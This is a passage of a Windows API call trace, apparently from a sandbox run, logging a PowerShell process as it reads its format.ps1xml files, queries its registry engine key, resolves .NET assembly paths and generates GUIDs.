	[0349.803] ReadFile (in: hFile=0x2f0, lpBuffer=0x3359550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x3359550*, lpNumberOfBytesRead=0x1cd4b8*=0x0, lpOverlapped=0x0) returned 1
	[0349.803] CloseHandle (hObject=0x2f0) returned 1
	[0349.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0349.803] SetErrorMode (uMode=0x1) returned 0x1
	[0349.803] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd460 | out: lpFileInformation=0x1cd460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0349.803] SetErrorMode (uMode=0x1) returned 0x1
	[0349.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0349.804] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd548 | out: phkResult=0x1cd548*=0x2f0) returned 0x0
	[0349.804] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd4cc, lpData=0x0, lpcbData=0x1cd4c8*=0x0 | out: lpType=0x1cd4cc*=0x1, lpData=0x0, lpcbData=0x1cd4c8*=0x56) returned 0x0
	[0349.804] CoTaskMemAlloc (cb=0x5a) returned 0x4443a0
	[0349.804] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd49c, lpData=0x4443a0, lpcbData=0x1cd498*=0x56 | out: lpType=0x1cd49c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd498*=0x56) returned 0x0
	[0349.804] CoTaskMemFree (pv=0x4443a0) 
	[0349.804] RegCloseKey (hKey=0x2f0) returned 0x0
	[0349.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0349.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0349.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0349.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0349.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0349.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0349.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0349.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0349.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0349.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0349.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0350.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0350.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0350.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0350.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0350.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0350.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0350.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0350.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0350.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0350.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0350.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0350.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0350.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0350.241] VirtualQuery (in: lpAddress=0x1cbfe0, lpBuffer=0x1ccea0, dwLength=0x30 | out: lpBuffer=0x1ccea0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.241] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x65c97e7b, Data2=0xf202, Data3=0x4fbc, Data4=([0]=0x80, [1]=0x26, [2]=0xe, [3]=0x7e, [4]=0x9d, [5]=0x59, [6]=0xdd, [7]=0x9d))) returned 0x0
	[0350.242] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x60f7cde5, Data2=0x7908, Data3=0x41c1, Data4=([0]=0xa6, [1]=0xcc, [2]=0xaa, [3]=0x51, [4]=0x35, [5]=0xe1, [6]=0x4c, [7]=0x9e))) returned 0x0
	[0350.243] VirtualQuery (in: lpAddress=0x1cc190, lpBuffer=0x1cd050, dwLength=0x30 | out: lpBuffer=0x1cd050*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.244] VirtualQuery (in: lpAddress=0x1cc190, lpBuffer=0x1cd050, dwLength=0x30 | out: lpBuffer=0x1cd050*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.245] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x4d3de5c7, Data2=0xacf2, Data3=0x4846, Data4=([0]=0xa5, [1]=0xea, [2]=0x42, [3]=0x76, [4]=0x7e, [5]=0x6e, [6]=0x5c, [7]=0x6b))) returned 0x0
	[0350.246] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x326cd8a1, Data2=0x135f, Data3=0x49de, Data4=([0]=0xb9, [1]=0x3a, [2]=0x15, [3]=0x34, [4]=0x4d, [5]=0x53, [6]=0x52, [7]=0x97))) returned 0x0
	[0350.246] VirtualQuery (in: lpAddress=0x1cc3e0, lpBuffer=0x1cd2a0, dwLength=0x30 | out: lpBuffer=0x1cd2a0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.246] VirtualQuery (in: lpAddress=0x1cc120, lpBuffer=0x1ccfe0, dwLength=0x30 | out: lpBuffer=0x1ccfe0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.246] VirtualQuery (in: lpAddress=0x1cc120, lpBuffer=0x1ccfe0, dwLength=0x30 | out: lpBuffer=0x1ccfe0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.246] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x68a0ef00, Data2=0x2e22, Data3=0x4dc3, Data4=([0]=0xa2, [1]=0x7a, [2]=0xba, [3]=0x79, [4]=0x9d, [5]=0xbd, [6]=0x9e, [7]=0xae))) returned 0x0
	[0350.246] VirtualQuery (in: lpAddress=0x1cc3e0, lpBuffer=0x1cd2a0, dwLength=0x30 | out: lpBuffer=0x1cd2a0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.247] VirtualQuery (in: lpAddress=0x1cc200, lpBuffer=0x1cd0c0, dwLength=0x30 | out: lpBuffer=0x1cd0c0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.247] VirtualQuery (in: lpAddress=0x1cba50, lpBuffer=0x1cc910, dwLength=0x30 | out: lpBuffer=0x1cc910*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.247] VirtualQuery (in: lpAddress=0x1cba50, lpBuffer=0x1cc910, dwLength=0x30 | out: lpBuffer=0x1cc910*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0350.247] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x9a31e3c2, Data2=0x82b9, Data3=0x454e, Data4=([0]=0xbb, [1]=0x3, [2]=0xc5, [3]=0x81, [4]=0xc4, [5]=0xa7, [6]=0x74, [7]=0xd7))) returned 0x0
	[0350.247] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x4a175d65, Data2=0x3e7d, Data3=0x438d, Data4=([0]=0xae, [1]=0x8f, [2]=0xd4, [3]=0x31, [4]=0xd4, [5]=0xea, [6]=0xf9, [7]=0xb4))) returned 0x0
	[0350.247] SetErrorMode (uMode=0x1) returned 0x1
	[0350.248] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f0
	[0350.248] GetFileType (hFile=0x2f0) returned 0x1
	[0350.248] SetErrorMode (uMode=0x1) returned 0x1
	[0350.248] GetFileType (hFile=0x2f0) returned 0x1
	[0350.248] ReadFile (in: hFile=0x2f0, lpBuffer=0x340bb48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x340bb48*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.248] ReadFile (in: hFile=0x2f0, lpBuffer=0x340bb48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x340bb48*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.249] ReadFile (in: hFile=0x2f0, lpBuffer=0x340bb48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x340bb48*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.249] ReadFile (in: hFile=0x2f0, lpBuffer=0x340bb48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x340bb48*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.250] ReadFile (in: hFile=0x2f0, lpBuffer=0x340bb48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x340bb48*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.250] ReadFile (in: hFile=0x2f0, lpBuffer=0x340bb48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x340bb48*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.250] ReadFile (in: hFile=0x2f0, lpBuffer=0x340bb48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x340bb48*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.250] ReadFile (in: hFile=0x2f0, lpBuffer=0x340bb48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x340bb48*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.251] ReadFile (in: hFile=0x2f0, lpBuffer=0x340bb48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x340bb48*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.251] ReadFile (in: hFile=0x2f0, lpBuffer=0x340bb48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x340bb48*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.251] ReadFile (in: hFile=0x2f0, lpBuffer=0x340bb48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x340bb48*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.251] ReadFile (in: hFile=0x2f0, lpBuffer=0x340bb48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x340bb48*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.252] ReadFile (in: hFile=0x2f0, lpBuffer=0x340bb48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x340bb48*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.252] ReadFile (in: hFile=0x2f0, lpBuffer=0x340bb48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x340bb48*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.252] ReadFile (in: hFile=0x2f0, lpBuffer=0x340bb48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x340bb48*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.252] ReadFile (in: hFile=0x2f0, lpBuffer=0x340bb48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x340bb48*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.253] ReadFile (in: hFile=0x2f0, lpBuffer=0x340bb48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x340bb48*, lpNumberOfBytesRead=0x1cd4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0350.253] ReadFile (in: hFile=0x2f0, lpBuffer=0x340bb48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x340bb48*, lpNumberOfBytesRead=0x1cd4b8*=0xbce, lpOverlapped=0x0) returned 1
	[0350.254] ReadFile (in: hFile=0x2f0, lpBuffer=0x340b27e, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x340b27e*, lpNumberOfBytesRead=0x1cd4b8*=0x0, lpOverlapped=0x0) returned 1
	[0350.254] ReadFile (in: hFile=0x2f0, lpBuffer=0x340bb48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4b8, lpOverlapped=0x0 | out: lpBuffer=0x340bb48*, lpNumberOfBytesRead=0x1cd4b8*=0x0, lpOverlapped=0x0) returned 1
	[0350.254] SetErrorMode (uMode=0x1) returned 0x1
	[0350.254] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd460 | out: lpFileInformation=0x1cd460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0350.552] SetErrorMode (uMode=0x1) returned 0x1
	[0350.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0350.552] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd548 | out: phkResult=0x1cd548*=0x2f0) returned 0x0
	[0350.552] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd4cc, lpData=0x0, lpcbData=0x1cd4c8*=0x0 | out: lpType=0x1cd4cc*=0x1, lpData=0x0, lpcbData=0x1cd4c8*=0x56) returned 0x0
	[0350.552] CoTaskMemAlloc (cb=0x5a) returned 0x444560
	[0350.552] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd49c, lpData=0x444560, lpcbData=0x1cd498*=0x56 | out: lpType=0x1cd49c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd498*=0x56) returned 0x0
	[0350.553] CoTaskMemFree (pv=0x444560) 
	[0350.553] RegCloseKey (hKey=0x2f0) returned 0x0
	[0350.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0350.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
